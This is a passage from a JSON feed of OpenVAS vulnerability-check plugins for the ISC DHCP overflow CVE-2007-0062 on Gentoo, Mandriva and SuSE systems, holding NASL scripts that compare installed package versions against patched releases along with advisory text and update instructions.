"2017-07-07T00:00:00", "id": "OPENVAS:61438", "href": "http://plugins.openvas.org/nasl.php?oid=61438", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A Denial of Service vulnerability was discovered in ISC DHCP.\";\ntag_solution = \"All ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200808-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=227135\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200808-05.\";\n\n \n\nif(description)\n{\n script_id(61438);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200808-05 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/dhcp\", unaffected: make_list(\"ge 3.1.1\"), vulnerable: make_list(\"lt 3.1.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:07", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:153.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:153 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:64460", "href": "http://plugins.openvas.org/nasl.php?oid=64460", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_153.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:153 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before\n3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build\n56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455\nand Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and\nACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528;\nallows remote attackers to cause a denial of service (daemon crash)\nor execute arbitrary code via a malformed DHCP packet with a large\ndhcp-max-message-size that triggers a stack-based buffer overflow,\nrelated to servers configured to send many DHCP options to clients\n(CVE-2007-0062).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:153\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:153.\";\n\n \n\nif(description)\n{\n script_id(64460);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:153 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:15", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5043200 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for DHCP", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65485", "href": "http://plugins.openvas.org/nasl.php?oid=65485", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5043200.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for DHCP\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5043200 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65485);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for DHCP\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1rc13~28.24\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:29", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:153.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:153 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064460", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064460", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_153.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:153 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before\n3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build\n56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455\nand Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and\nACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528;\nallows remote attackers to cause a denial of service (daemon crash)\nor execute arbitrary code via a malformed DHCP packet with a large\ndhcp-max-message-size that triggers a stack-based buffer overflow,\nrelated to servers configured to send many DHCP options to clients\n(CVE-2007-0062).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:153\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:153.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64460\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:153 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:51", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for DHCP", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65863", "href": "http://plugins.openvas.org/nasl.php?oid=65863", "sourceData": "#\n#VID slesp2-dhcp-5975\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for DHCP\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65863);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for DHCP\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:22", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5043200 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for DHCP", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065485", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065485", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5043200.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for DHCP\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5043200 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65485\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for DHCP\");\n\n\n\n 